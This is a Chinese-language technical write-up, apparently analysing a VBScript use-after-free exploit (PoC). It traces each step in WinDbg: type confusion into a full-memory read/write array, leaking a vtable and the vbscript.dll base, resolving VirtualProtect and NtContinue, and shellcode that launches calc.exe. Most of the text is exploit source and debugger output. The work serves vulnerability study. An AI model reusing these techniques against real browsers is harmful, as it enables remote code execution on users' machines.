代码语言:javascript复制Class cla4 Dim mem Function P End Function Function SetProp(Value) IsEmpty("enter cla4:SetPro") mem=0 mem=Value '这一步会调用cla6的Get P SetProp=0 End Function End Class在Get P中实现了又一次的占位与一次类型的替换:
代码语言:javascript复制Class cla6 Public Default Property Get P 'Property Get 语句 用来取得(返回)的值 IsEmpty("cal6:call Get P") Dim cla5_obj1 'CDbl是转换成双精度浮点数据类型 ' db 0, 0, 0, 0, 0Ch, 20h, 0, 0 P=CDbl("174088534690791e-324") 'P是返回值 对cla4_mem赋值,把string改为array类型 For i=0 To 6 'array_b保存了cla1 object的引用,而cla1 object被释放后是由 array_b(i)=0 'cla4_obj1占位的。array_b赋值为0,也就是将cla4_obj1的内存释放了 Next IsEmpty("finish set array_b to 0") Set cla5_obj1=New cla5 '再次使用悬垂指针重新用cla5_obj1占位, cla5_obj1.mem=str_1 '并对cla5.mem赋值伪造的字符串 7fffffff的safearray, 'str_1=Unescape("ࢀ�����翿��") IsEmpty(cla5_obj1) For i=0 To 6 Set array_b(i)=cla5_obj1 Next End Property End Class调试:cla6 Get P中的第一个IsEmpty :
代码语言:javascript复制//打印一个标记,表示进入Get P函数: 0:005> dd poi(esp c) 01cd08a8 00000008 00000000 01cc7fb4 00000000 01cd08b8 00000000 00000000 00000000 00000000 01cd08c8 00000000 00000000 00000000 00000000 01cd08d8 00000000 00000000 00000000 00000000 01cd08e8 00000000 00000000 00000000 00000000 01cd08f8 00000000 00000000 00000000 00000000 01cd0908 712f0000 01cb2564 01cd2440 712f4211 01cd0918 0249c720 01cd0938 01cb2560 712f4211 0:005> du 01cc7fb4 01cc7fb4 "cal6:call Get P"第二个IsEmpty:
代码语言:javascript复制0:005> dd poi(esp c) 01cd08a8 00000008 00000000 01cc7fdc 0000200c 01cd08b8 02490002 01cd2fa8 01cb0006 0249c454 01cd08c8 02490002 01cd2fa8 01cb0001 0249c454 0:005> du 01cc7fdc 01cc7fdc "finish set array_b to 0"Free之前的占位
还记得上面分析UAF里面的第一次cla4_obj1对Trigger的占位吗,现在再次查看下这个地址:
代码语言:javascript复制// For i=0 To 6 // array_b(i)=0 // Next //由于重新进行了调试,这一次的地址是1cb2528,最近的这条日志可以打印出这个地址 Class cla4 at 1cb2528, terminate called 0:005> dd 1cb2528 01cb2528 712f00d4 00000000 00000000 00000000 //原本占位在这里的cla4_obj1的内存被释放了 01cb2538 000003ec 00000000 00000000 00000000 01cb2548 00000000 002de2a4 00000000 00000000 01cb2558 59acc226 88008da0 712f1748 00000001 01cb2568 01cb5210 003be638 000003ec 00000000 01cb2578 00000000 00000000 00000000 002a613c 01cb2588 00000000 01cb24f0 59acc23f 8c000000 01cb2598 712fce78 71303100 713030f0 00000002 0:005> !heap -a -p 1cb2528 ********************************************** the `!heap -p' commands in exts.dll have been replaced with equivalent commands in ext.dll. If your are in a KD session, use `!ext.heap -p` ********************************************** 0:005> !heap -p -a 1cb2528 address 01cb2528 found in _HEAP @ 3b0000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 01cb2520 0007 0000 [00] 01cb2528 00030 - (free) //堆回溯查看已经被free重新占位,伪造数据结构
第三次断点,此时再次进行占位,使用的是cla5_obj1;
代码语言:javascript复制//源码 Set cla5_obj1=New cla5 '再次使用悬垂指针重新用cla5_obj1占位, cla5_obj1.mem=str_1 IsEmpty(cla5_obj1) '这个str1是一个全局变量, 'str_1=Unescape("ࢀ�����翿��")Breakpoint 3 hit eax=712f185c ebx=0249c5f8 ecx=7134a9d8 edx=0249c570 esi=01cc7394 edi=00000001 eip=7130c206 esp=0249c48c ebp=0249c49c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 7130c206 8bff mov edi,edi 0:005> dd 01cb2528 //可以直接查看前面一步被free的地址,已经再次占位成功 01cb2528 712f1748 00000002 01c***f0 003be638 //这个01c***f0是cla5.mem的地址 01cb2538 000003ec 00000000 00000000 00000000 01cb2548 00000000 002de344 00000000 01cb2560 01cb2558 59acc226 88008da0 712f1748 00000001 01cb2568 01cb5210 003be638 000003ec 00000000 01cb2578 00000000 00000000 00000000 002a613c 01cb2588 01cb2528 01cb24f0 59acc23f 8c000000 01cb2598 712fce78 71303100 713030f0 00000002 0:005> du 002de344 002de344 "cla5" //源码 cla5_obj1.mem=str_1 0:005> dd 01c***f0 01c***f0 01cb74a8 000000b8 00000100 00000100 01cb5100 00004000 01cb74ac 01cb754c 01cb3e30 01cb5110 0000000f 00000003 00000040 00000003 01cb5120 00000014 01cb5128 01cb74ac 01cb74f4 01cb5130 01cb752c 00000475 00000000 01cb5100 01cb5140 01cb5114 00000002 00000000 00000477 01cb5150 0000047d 000015c6 00000002 00000000 01cb5160 0000047e 00000482 00000bfc 00000012 0:005> dd 01cb752c 01cb752c 00000008 00000000 002de2f4 00000000 //0x08是类型,代表的vbstring,后面会把这个类型改为safearray即0x200c 01cb753c 00000000 00000000 0000822f 00000006 01cb754c 00000000 00000000 00000003 01cb752c 01cb755c 0065006d 0000006d 00000b19 00000b5b 01cb756c 00000000 01cb749c 01cb7540 00000001 01cb757c 00000000 00000b65 00000b69 01cb7824 01cb758c 00000001 00000000 00000b6a 00000b6e 01cb759c 01cb7824 00000002 00000000 00000b6f //看伪造的这个类似于数组的字符串,它的元素有7fffffff个,每个元素占一字节,元素内存地址为0,那它能访问的内存空间是0-0x7fffffff //如果现在类型变为safearray,就能够实现全址读写 //str_1=Unescape("ࢀ�����翿��") 0:005> dd 002de2f4 002de2f4 08800001 00000001 00000000 00000000 002de304 7fffffff 00000000 00000000 585693f7 002de314 88000000 0000000e 81ea6765 98757f51双精度浮点数完成类型混淆的原理
Get P 执行完成后,P作为返回值返回给cla4.mem成员变量中,那么P是什么:
代码语言:javascript复制//源码中; P=174088534690791e-324 //优化后这样的: P=CDbl("174088534690791e-324") //CDbl是vbs中的吧表达式转化为双精度类型的一个函数 174088534690791 e-324 是174088534690791的-324平方 用c语言计算为:printf("%I64xn",174088534690791e-324); 为,200c00000000, 由它是vbDouble类型,前面会有一个0x05的标志, 最终在内存中P的值为:00000005 00000000 00000000 0000200C再次查看mem地址;
代码语言:javascript复制0:005> dd 01cb752c 01cb752c 0000200c 00000000 002de2f4 00000000 //类型被改为200c,代表着safearray类型01cb753c 00000000 00000000 0000822f 00000006 01cb754c 00000000 00000000 00000003 01cb752c 01cb755c 0065006d 0000006d 00000b19 00000b5b 01cb756c 00000000 01cb749c 01cb7540 00000001 01cb757c 00000000 00000b65 00000b69 01cb7824 01cb758c 00000001 00000000 00000b6a 00000b6e 01cb759c 01cb7824 00000002 00000000 00000b6f 0:005> dd 01cb752c-c 01cb7520 00000005 00000000 00000000 0000200c //这个就是P在内存中的值01cb7530 00000000 002de2f4 00000000 00000000 01cb7540 00000000 0000822f 00000006 00000000 01cb7550 00000000 00000003 01cb752c 0065006d 01cb7560 0000006d 00000b19 00000b5b 00000000 01cb7570 01cb749c 01cb7540 00000001 00000000 01cb7580 00000b65 00000b69 01cb7824 00000001 01cb7590 00000000 00000b6a 00000b6e 01cb7824 //为什么是从mem地址-c开始的,,这个-c的位置,是原来没有被释放的时候的cla4_obj1.mem的地址, //就是P修改的是释放前的mem的地址,释放前与占位后的mem相差0x0C字节, //00000005 00000000 00000000 0000200C这个数,刚好从0c的位置写入了0x200c最终实现了 vbstring→safearray的类型转换,cla5.mem最终拿到任意地址读写权限
在InitObjects函数中的cla4_obj2.SetProp(cla7_obj1)使用了同样的方法,
代码语言:javascript复制伪造的字符串: str_2=Unescape("��������") 转换的类型: P=CDbl("636598737289582e-328") //dd 00000005 00000000 00000000 00000003 0x03是vbLong类型;cla7的Get P中的第一次IsEmpty,free类对象地址:
代码语言:javascript复制//这次特意提前保存了没有被free的cla4_obj2类对象地址的状态: 0:005> dd 1cb2560 01cb2560 712f1748 00000007 01cb5210 003be638 01cb2570 000003ec 00000000 00000000 00000000 01cb2580 00000000 002a613c 01cb2528 01cb24f0 01cb2590 59acc23f 80000000 712f00d4 71303100 01cb25a0 713030f0 00000000 00000000 00000000 01cb25b0 00000000 0249cb64 00000000 00000000 01cb25c0 00000000 00000000 59acc234 80000000 01cb25d0 712f00db 71303100 713030f0 00000000 //目前还是cla4_obj2.mem 0:005> dd 01cb5210 01cb5210 01cb76d8 000000ac 00000100 00000100 01cb5220 00004000 01cb76dc 01cb7770 01cb3ec0 01cb5230 0000000f 00000003 00000040 00000003 01cb5240 00000014 01cb5248 01cb76dc 01cb7710 01cb5250 01cb7750 000004a3 00000000 01cb51b8 01cb5260 01cb522c 00000002 00000000 000004a5 //占位前的mem地址是01cb7750 0:005> dd 01cb7750 01cb7750 02490000 01cd2808 01cc0000 0249ce98 01cb7760 00000000 01cb7938 0000822f 00000006 01cb7770 00000000 00000000 00000003 00000000 Class cla4 at 1cb2560, terminate called Breakpoint 3 hit eax=712f185c ebx=0249c5f8 ecx=7134a9d8 edx=0249c570 esi=01cc7394 edi=00000001 eip=7130c206 esp=0249c48c ebp=0249c49c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 7130c206 8bff mov edi,edi 0:005> dd poi(esp c) 01cd08a8 00000008 00000000 01cc7f6c 00000003 01cd08b8 02490002 01cd2fa8 01cb0006 0249c454 01cd08c8 02490002 01cd2fa8 01cb0001 0249c454 01cd08d8 00000000 00000000 00000000 00000000 01cd08e8 00000000 00000000 00000000 00000000 01cd08f8 00000000 00000000 00000000 00000000 01cd0908 00000005 00000000 00000000 00000003 01cd0918 0249c720 01cd0938 01cb2560 712f4211 0:005> du 01cc7f6c 01cc7f6c "finish set array_c to 0" //再看类对象地址已经被free 0:005> dd 1cb2560 01cb2560 712f00d4 00000000 00000000 00000000 01cb2570 000003ec 00000000 00000000 00000000 01cb2580 00000000 002a613c 00000000 00000000 01cb2590 59acc23f 8c000000 712fce78 71303100 01cb25a0 713030f0 00000002 003be638 01cd27d0 01cb25b0 0029f090 0249cb64 00000000 00000000 01cb25c0 00000000 00000000 59acc234 80000000 01cb25d0 712f00db 71303100 713030f0 00000000 0:005> !heap -p -a 1cb2560 address 01cb2560 found in _HEAP @ 3b0000 HEAP_ENTRY Size Prev Flags UserPtr UserSize - state 01cb2558 0007 0000 [00] 01cb2560 00030 - (free)cla7的Get P中的第二次IsEmpty,占位:
代码语言:javascript复制Breakpoint 3 hit eax=712f185c ebx=0249c5f8 ecx=7134a9d8 edx=0249c570 esi=01cc7394 edi=00000001 eip=7130c206 esp=0249c48c ebp=0249c49c iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 7130c206 8bff mov edi,edi 0:005> dd 1cb2560 01cb2560 712f1748 00000002 01cb5210 003be638 //占位成功 ,01cb5210为cla5.mem 01cb2570 000003ec 00000000 00000000 00000000 01cb2580 00000000 002a613c 00000000 01cb2528 01cb2590 59acc23f 8c000000 712fce78 71303100 01cb25a0 713030f0 00000002 003be638 01cd27d0 01cb25b0 0029f090 0249cb64 00000000 00000000 01cb25c0 00000000 00000000 59acc234 8c000000 01cb25d0 712fce78 71303100 713030f0 00000001 0:005> du 002a613c 002a613c "cla5" :005> dd 01cb5210 01cb5210 01cb76d8 000000b8 00000100 00000100 01cb5220 00004000 01cb76dc 01cb777c 01cb3ec0 01cb5230 0000000f 00000003 00000040 00000003 01cb5240 00000014 01cb5248 01cb76dc 01cb7724 01cb5250 01cb775c 000004a3 00000000 01cb51b8 01cb5260 01cb522c 00000002 00000000 000004a5 01cb5270 000004aa 00000c93 00000002 00000000 01cb5280 000004ab 000004af 000017a6 00000012 //可以看到占位后的地址是 01cb775c 与上面保存的占位前的mem的地址01cb7750相差0xc 0:005> dd 01cb775c 01cb775c 00000008 00000000 002de31c 00000000 //原始类型为一个0x08 vbstring类型 01cb776c 00000000 00000000 0000822f 00000006 01cb777c 00000000 00000000 00000003 45001e5b //当前字符串的内容为:str_2=Unescape("��������") 0:005> dd 002de31c 002de31c 00000000 00000000 00000000 00000000 002de32c 00000000 00000000 00000000 585693f2cla7的Get P中的第三次IsEmpty,类型混淆:
代码语言:javascript复制0:005> dd 01cb5210 01cb5210 01cb76d8 000000b8 00000100 00000100 01cb5220 00004000 01cb76dc 01cb777c 01cb3ec0 01cb5230 0000000f 00000003 00000040 00000003 01cb5240 00000014 01cb5248 01cb76dc 01cb7724 01cb5250 01cb775c 000004a3 00000000 01cb51b8 01cb5260 01cb522c 00000002 00000000 000004a5 01cb5270 000004aa 00000c93 00000002 00000000 01cb5280 000004ab 000004af 000017a6 00000012 0:005> dd 01cb775c 01cb775c 00000003 00000000 002de31c 00000000 //类型更改后,0x03是vbLong类型01cb776c 00000000 00000000 0000822f 00000006 01cb777c 00000000 00000000 00000003 45001e5b //P=CDbl("636598737289582e-328") //dd 00000005 00000000 00000000 000000030:005> dd 01cb775c-c 01cb7750 00000005 00000000 00000000 00000003 01cb7760 00000000 002de31c 00000000 00000000 01cb7770 00000000 0000822f 00000006 00000000 01cb7780 00000000 00000003 45001e5b 0065006d泄露指向字符串的指针,最后还有一句关键的代码:
代码语言:javascript复制//源码 Alert "InitObjects2" spec_int_1=cla4_obj2.mem '这句将上面指向0000的那个字符串的指针泄露给了spec_int_1 IsEmpty(spec_int_1)0:005> dd poi(esp c) 0055fe68 00000003 00000000 003f9dd4 0c002e3a 0055fe78 00000000 00000000 02021598 00000000 0055fe88 024bd3d8 0055fea8 020217a0 00000000 0055fe98 024b0000 0055ffa8 00000000 00000000 0055fea8 024bd61c 0055ffa8 02021598 00000000 0055feb8 0000400c 00000000 02020fd0 00000000 0055fec8 0000400c 00000000 02020f80 00000000 0055fed8 0000400c 00000000 02020f3c 00000000 0:005> dd 003f9dd4 003f9dd4 00000000 00000000 00000000 00000000 //这个地址指向的就是00那个字符串, 003f9de4 00780000 00000074 003f93a4 4b92935b //由于windbg重新启动地址与上面不一致,但是从周围的元素可以观察出是一致的 003f9df4 8c000000 00000001 00000000 00000000 003f9e04 7fffffff 7fffffff 80000001 80000001 003f9e14 00000000 4b929326 88000000 00000000 003f9e24 006e0000 00740069 0062004f 0065006a 003f9e34 00740063 00000073 003f9e4c 4b92932d 003f9e44 88000000 00000018 006e0049 007400693.3.PoC 中的地址泄露
代码语言:javascript复制//此函数泄露 CScriptEntryPoint 对象的虚函数表地址,该地址属于Vbscript.dll。 Function LeakVBAddr On Error Resume Next '忽略错误,执行下一条代码 Dim emptySub_addr_placeholder '构造一个类型为null 的 CScriptEntryPoint 对象 emptySub_addr_placeholder=EmptySub emptySub_addr_placeholder=null IsEmpty(emptySub_addr_placeholder) '此断点可以查看此 CScriptEntryPointObject 地址 SetMemValue emptySub_addr_placeholder '这种传参数不用括号也是可以的 LeakVBAddr=GetMemValue() End Function在LeakVBAddr函数中 IsEmpty 断下查看 emptySub_addr_placeholder 是什么;
代码语言:javascript复制0:005> dd poi(esp c)
0055fe58 00000001 000007ff 0055e030 cf0000cf //这个对象地址下一步会保存在指向空字符串 8的地方0055fe68 00000001 000007ff 0055e030 cf0000cf
0055fe78 00000000 00000000 02021598 00000000
0055fe88 024bd3d8 0055fea8 020217a0 00000000
0:005> ln poi(0055e030)//发现它是一个CScriptEntryPoint对象,(6a5b4934) vbscript!CScriptEntryPoint::`vftable' | (6a5cab54) vbscript!CEntryPointDispatch::`vftable'
Exact matches:
vbscript!CScriptEntryPoint::`vftable` = <no type information>源码短短几句简单的代码会产生一个CScriptEntryPoint对象的原因为:
代码语言:javascript复制On Error Resume Next //首先它定义了忽略错误 Dim emptySub_addr_placeholder //定义一个变量 emptySub_addr_placeholder =EmptySub //将函数指针赋值给一个变量,VBS语法是不允许这样的 //但是其上面忽略了错误,最终这个函数指针的值仍然被赋值给了变量 emptySub_addr_placeholder=null //然后将该值的类型设置为null //最终,变量里面仍然保存着一个函数指针,但是类型为null进入SetMemValue函数: 要记住上面在InitObjects函数的最后spec_int_1中保存的就是那个0字符串的地址
代码语言:javascript复制//源码 Sub SetMemValue(ByRef Ili) cla4_obj1.mem(spec_int_1 8)=Ili '将CScriptEntryPoint对象放到spec_int_1 8的位置 IsEmpty("SetMemValue Finish") End Sub可以这样修改是因为在cla4_obj1.mem已经是一个可以全地址读写的array了,继续,IsEmpty断下后:
代码语言:javascript复制//调试 Breakpoint 3 hit eax=6a5b185c ebx=024bcea0 ecx=6a60a9d8 edx=024bce18 esi=02016a68 edi=00000001 eip=6a5cc206 esp=024bcd34 ebp=024bcd44 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6a5cc206 8bff mov edi,edi //这个地址就是上面的指向空字符的地址: 0:005> dd 003f9dd4 003f9dd4 00000000 00000000 00000001 000007ff //从 8的位置保存的便是CScriptEntryPoint对象,这个0x01是vbNull(可查询上方表格) 003f9de4 0055e030 cf0000cf 003f93a4 4b92935b 003f9df4 8c000000 00000001 00000000 00000000 003f9e04 7fffffff 7fffffff 80000001 80000001 003f9e14 00000000 4b929326 88000000 00000000 003f9e24 006e0000 00740069 0062004f 0065006a 003f9e34 00740063 00000073 003f9e4c 4b92932d 003f9e44 88000000 00000018 006e0049 00740069然后进入GetMemValue函数:
代码语言:javascript复制//源码Function GetMemValue cla4_obj1.mem(spec_int_1)= 3 '将CScriptEntryPoint对象 的类型改为3 即为Long IsEmpty("GetMemValue Finish") GetMemValue=cla4_obj1.mem(spec_int_1 8)End FunctionIsEmpty 断下后:
代码语言:javascript复制//调试 0:005> dd poi(esp c) 0055fe38 00000008 024bcf28 02016a38 03120780 0055fe48 024b0000 0055fe88 024b0001 0055c7e8 0055fe58 024bd194 0055fe88 0055fe68 cf0000cf 0:005> du 02016a38 02016a38 "GetMemValue Finish" //这是打的断点标记 0:005> dd 003f9dd4 //str_2地址 003f9dd4 00000002 024bcf28 02020003 03120780 //02020003高位保存的03(vbLong)就是赋值的位置,类型改变成功了,但是周围生成的值是哪里来的(这些值是不影响的但是就是没搞清楚来源)? 003f9de4 0055e030 cf0000cf 003f93a4 4b92935b // 8的位置没有变 003f9df4 8c000000 00000001 00000000 00000000 003f9e04 7fffffff 7fffffff 80000001 80000001 003f9e14 00000000 4b929326 88000000 00000000 003f9e24 006e0000 00740069 0062004f 0065006a 003f9e34 00740063 00000073 003f9e4c 4b92932d 003f9e44 88000000 00000018 006e0049 00740069在GetMemValue=cla4_obj1.mem(spec_int_1 8)这一步把0055e030的值给了GetMemValue,GetMemValue赋值给了LeakVBAddr ,以上整个 LeakVBAddr 函数过程得到了 vbLong 型的 CScriptEntryPoint对象地址
我们在 StartExploit 中确认一下是否正确
代码语言:javascript复制UAF InitObjects vb_adrr=LeakVBAddr() IsEmpty(vb_adrr) //确认IsEmpty的值在 IsEmpty 中断下:
代码语言:javascript复制Breakpoint 3 hit eax=6a5b185c ebx=024bd328 ecx=6a60a9d8 edx=024bd2a0 esi=02016a68 edi=00000001 eip=6a5cc206 esp=024bd1bc ebp=024bd1cc iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246 vbscript!VbsIsEmpty: 6a5cc206 8bff mov edi,edi 0:005> dd poi (esp c) 0055fe88 02020003 03120780 0055e030 cf0000cf //的确是我们上面得到的类对象地址 0055fe98 024b0000 0055ffa8 00000000 00000000 0055fea8 024bd61c 0055ffa8 02021598 00000000 0:005> ln poi(0055e030) (6a5b4934) vbscript!CScriptEntryPoint::`vftable' | (6a5cab54) vbscript!CEntryPointDispatch::`vftable' Exact matches: vbscript!CScriptEntryPoint::`vftable' = <no type information>3.4 关键地址的获取
3.4.1 获取虚函数表地址
先看 PoC 中的GetUint32函数:
代码语言:javascript复制//函数参数为对象地址,然后该函数返回的是这个对象的虚函数表地址 Function GetUint32(addr) Dim value IsEmpty("enter GetUint32") cla4_obj1.mem(spec_int_1 8)=addr 4 '原本存放CScriptEntryPoint对象的位置 存放 该对象地址 4 IsEmpty("spec_int_1 8") cla4_obj1.mem(spec_int_1)=8 '改为字符串 type string IsEmpty("type string") value=cla4_obj1.P0123456789 IsEmpty(value) cla4_obj1.mem(spec_int_1)=2 '改为 整型 type vbInteger IsEmpty("type vbInteger") GetUint32=value End Function单纯看上面代码一头雾水,我们从内存中看:
代码语言:javascript复制//刚enter GetUint32时,003c7c7c地址是str_2空字符串地址 0:005> dd 003c7c7c 003c7c7c 00000002 0241cdc0 772c0003 0241d1f8 //772c0003mem地址 003c7c8c 0061e788 0241d038 00000000 08e9cd8e //0061e788是CScriptEntryPoint类对象地址 003c7c9c 80000000 688a0075 00000873 003c9188 003c7cac 00000000 003c7cf0 00000035 003fbc74 003c7cbc 003c7ccc 08e9cd85 80000000 0000007a 003c7ccc 00680063 00630065 0062006b 0078006f 003c7cdc 00000000 00000000 00000000 08e9cd80 003c7cec 80000000 688a0048 00000874 003c9188 //cla4_obj1.mem(spec_int_1 8)=addr 4 0:005> dd 003c7c7c 003c7c7c 00000002 0241cdc0 772c0003 0241d1f8 003c7c8c 0061e78c 0241d038 00000000 08e9cd8e //0061e788---> 0061e78c003c7c9c 80000000 688a0075 00000873 003c9188 003c7cac 00000000 003c7cf0 00000035 003fbc74 003c7cbc 003c7ccc 08e9cd85 80000000 0000007a 003c7ccc 00680063 00630065 0062006b 0078006f 003c7cdc 00000000 00000000 00000000 08e9cd80 003c7cec 80000000 688a0048 00000874 003c9188 // cla4_obj1.mem(spec_int_1)=8 0:005> dd 003c7c7c 003c7c7c 772c0002 0241d1f8 02440008 0241d038 //类型0x03vbLong-->0x08vbString003c7c8c 0061e78c 0241d038 00000000 08e9cd8e 003c7c9c 80000000 688a0075 00000873 003c9188 003c7cac 00000000 003c7cf0 00000035 003fbc74 003c7cbc 003c7ccc 08e9cd85 80000000 0000007a 003c7ccc 00680063 00630065 0062006b 0078006f 003c7cdc 00000000 00000000 00000000 08e9cd80 003c7cec 80000000 688a0048 00000874 003c9188然后 value=cla4_obj1.P0123456789 这一步,先说结论,最终返回的是 CScriptEntryPoint类对象的虚函数表地址 为什么? 看一下 cla4_obj1.P0123456789 的实现逻辑:
代码语言:javascript复制Class cla5 Dim mem Function P0123456789 P0123456789=LenB(mem(spec_int_1 8)) End Function Function SPP End Function End ClassLenB 在 VBscript.dll 中调用的是 cbLengthBstr,下面是它的代码
代码语言:javascript复制.text:6E4F38C2 ; unsigned __int32 __stdcall cbLengthBstr(unsigned __int16 *) .text:6E4F38C2 ?cbLengthBstr@@YGKPAG@Z proc near ; CODE XREF: rtConcatBstr(ushort *,ushort *) C p .text:6E4F38C2 ; rtConcatBstr(ushort *,ushort *) 16 p ... .text:6E4F38C2 .text:6E4F38C2 arg_0 = dword ptr 8 .text:6E4F38C2 .text:6E4F38C2 mov edi, edi .text:6E4F38** push ebp .text:6E4F38C5 mov ebp, esp .text:6E4F38C7 mov eax, [ebp arg_0] .text:6E4F38CA test eax, eax .text:6E4F38CC jz short loc_6E4F38D1 .text:6E4F38CE mov eax, [eax-4] //这一步是重点 .text:6E4F38D1 .text:6E4F38D1 loc_6E4F38D1: ; CODE XREF: cbLengthBstr(ushort *) A j .text:6E4F38D1 pop ebp .text:6E4F38D2 retn 4 .text:6E4F38D2 ?cbLengthBstr@@YGKPAG@Z endpCScriptEntryPoint对象地址是 0061e788,对象地址 4仍然存放在这里就是0061e78c ,代码更改了它的类型为vbstring,那么这个值就变成了BSTR 字符串指针 ,然后使用LenB求它的长度;
但是在 cbLengthBstr 内部的执行是将mov eax, [eax-4], 这是因为正常的 BSTR 字符串的结构是:前四个字节保存的是字符串长度,在字符串结尾以字符0识别,BSTR 。
但是我们这个原本不是 BSTR 字符串类型,当[eax-4] 的时候得到仍然是类对象地址中的内容;
代码语言:javascript复制0:005> dd [0061e78c-4] 0061e788 6e654934 00000001 0061ff68 02446528 //0061e788保存的本来就是虚函数表的地址0061e798 0244f9a8 00000000 0061ff68 0061fc80 0061e7a8 67352229 0800c9e4 6e654934 00000001 0061e7b8 0061ff68 02446528 0244f9dc 00000000 0061e7c8 0061ff68 0061fc80 67352229 0800c9e4 0061e7d8 6e654934 00000001 0061ff68 02446528 0061e7e8 0244fa50 00000000 0061ff68 0061fc80 0061e7f8 67352229 0800c9e4 6e654934 00000001以上为得到VBScript.dll中的CScriptEntryPoint对象虚函数表的过程
3.4.2.获取 VBScript.dll 基地址
代码语言:javascript复制Function FindMzBase(vtable_address) Dim base base=vtable_address And &hffff0000 '64k对齐,得到vbscript.dll 基地址 Alert "FindMzBase " IsEmpty(base) Do While GetUint32(base &h68)<>&h206E6920 Or GetUint32(base &h6c)<>&h20534F44 base=base-&h10000 Loop IsEmpty(base) FindMzBase=base End Function上面获得的虚函数表的地址是 CScriptEntryPoint 对象的,这个地址属于 VBScript.dll,由于内存的64k对齐,把虚函数表地址后四位置零便得到 VBScript.dll 的基地址。
3.4.3.获取其余关键dll与函数地址
VBScript.dll 导入了 msvcrt.dll , msvcrt.dll 又导入了 kernelbase.dll 与 ntdll.dll ,遍历它们的导入表最终可以从 kernelbase.dll 中获取到 VirtualProtect 函数地址,从 ntdll.dll 中获取 NtContinue 函数地址。
这部分属于PE文件的操作,请允许我不再详细分析。
代码语言:javascript复制 '首先得到VBScript地址,其传入的是CScriptEntryPoint虚函数表对象地址 vbs_base=FindMzBase(GetUint32(vb_adrr)) Alert "VBScript Base: 0x" & Hex(vbs_base) '遍历VBScript.dll导入表找到msvcrt.dll基地址 msv_base=GetBaseFromImport(vbs_base,"msvcrt.dll") Alert "MSVCRT Base: 0x" & Hex(msv_base) '遍历msvcrt.dll导入表找到kernelbase.dll基地址 krb_base=GetBaseFromImport(msv_base,"kernelbase.dll") Alert "KernelBase Base: 0x" & Hex(krb_base) '遍历msvcrt.dll导入表找到ntdll.dll基地址 ntd_base=GetBaseFromImport(msv_base,"ntdll.dll") Alert "Ntdll Base: 0x" & Hex(ntd_base) '从kernelbase.dll找到VirtualProtect函数地址 VirtualProtectAddr=GetProcAddr(krb_base,"VirtualProtect") Alert "KernelBase!VirtualProtect Address 0x" & Hex(VirtualProtectAddr) '从ntdll.dll找到 NtContinue 函数地址 NtContinueAddr=GetProcAddr(ntd_base,"NtContinue") Alert "Ntdll!NtContinue Address 0x" & Hex(NtContinueAddr)3.5 ShellCode的执行
3.5.1.ShellCode位置
源码中的shellcode部分的混淆我没有去理会,我们只要研究他是怎么执行起来的,环境是怎么构造的;
代码语言:javascript复制//PoC源码 SetMemValue GetShellcode() ShellcodeAddr=GetMemValue() 8 IsEmpty(ShellcodeAddr)//GetShellcode()最终返回的是Shellcode的地址, //SetMemValue 仍然与将这个字符串赋值到cla4_obj1.mem处 //执行之前spec_int_1处: //现在保留的是CScriptEntryPoint对象 4的一个值,正常这里是最近的获取的函数的值 0:014> dd 00579aec 00579aec 00000002 00000000 6e610002 00000000 00579afc 0019e90c 025dcd08 00000000 01ad84c9 00579b0c 88000000 00000006 006f0046 0000006f 00579b1c 6d887684 0000606f 0000003e 00000000 00579b2c 00000000 01ad84ce 88000000 00000018 00579b3c 0065006d 00730073 00670061 00530065 00579b4c 00790074 0065006c 00000000 01ad84c3 00579b5c 80000000 688a00ed 0000086e 00579310 //SetMemValue GetShellcode()执行之后 0:006> dd 00579aec 00579aec 00000002 00000000 025d0008 01c03508 00579afc 025e0024 025dc864 00000000 01ad84c9 00579b0c 88000000 00000006 006f0046 0000006f 00579b1c 6d887684 0000606f 0000003e 00000000 00579b2c 00000000 01ad84ce 80000000 000000ac 00579b3c 00000071 00530074 00650068 006c006c 00579b4c 006f0063 00650064 00000000 01ad84c3 00579b5c 88000000 00000004 00300030 00310000 //ShellcodeAddr=GetMemValue() 8 //GetMemValue函数把spec_int_1类型改为long型,并把 08的地址返回025e0024 就是shellcode的入口,准确的说是在 025e0024 8 的位置 在内存中看一下:
代码语言:javascript复制0:006> db 025e0024 l100 //从025e002c开始,前面是00 025e0024 00 00 00 00 00 00 00 00-fc e8 82 00 00 00 60 89 ..............`. 025e0034 e5 31 c0 64 8b 50 30 8b-52 0c 8b 52 14 8b 72 28 .1.d.P0.R..R..r( 025e0044 0f b7 4a 26 31 ff ac 3c-61 7c 02 2c 20 c1 cf 0d ..J&1..<a|., ... 025e0054 01 c7 e2 f2 52 57 8b 52-10 8b 4a 3c 8b 4c 11 78 ....RW.R..J<.L.x 025e0064 e3 48 01 d1 51 8b 59 20-01 d3 8b 49 18 e3 3a 49 .H..Q.Y ...I..:I 025e0074 8b 34 8b 01 d6 31 ff ac-c1 cf 0d 01 c7 38 e0 75 .4...1.......8.u 025e0084 f6 03 7d f8 3b 7d 24 75-e4 58 8b 58 24 01 d3 66 ..}.;}$u.X.X$..f 025e0094 8b 0c 4b 8b 58 1c 01 d3-8b 04 8b 01 d0 89 44 24 ..K.X.........D$ 025e00a4 24 5b 5b 61 59 5a 51 ff-e0 5f 5f 5a 8b 12 eb 8d $[[aYZQ..__Z.... 025e00b4 5d 6a 01 8d 85 b2 00 00-00 50 68 31 8b 6f 87 ff ]j.......Ph1.o.. 025e00c4 d5 bb f0 b5 a2 56 68 a6-95 bd 9d ff d5 3c 06 7c .....Vh......<.| 025e00d4 0a 80 fb e0 75 05 bb 47-13 72 6f 6a 00 53 ff d5 ....u..G.roj.S.. 025e00e4 63 61 6c 63 2e 65 78 65-00 41 65 00 00 00 00 00 calc.exe.Ae..... 025e00f4 00 00 00 00 00 00 00 cc-cc cc cc cc cc cc cc cc ................ 025e0104 3f 71 3d 37 30 35 35 34-38 26 76 3d 33 00 41 41 ?q=705548&v=3.AA 025e0114 41 41 41 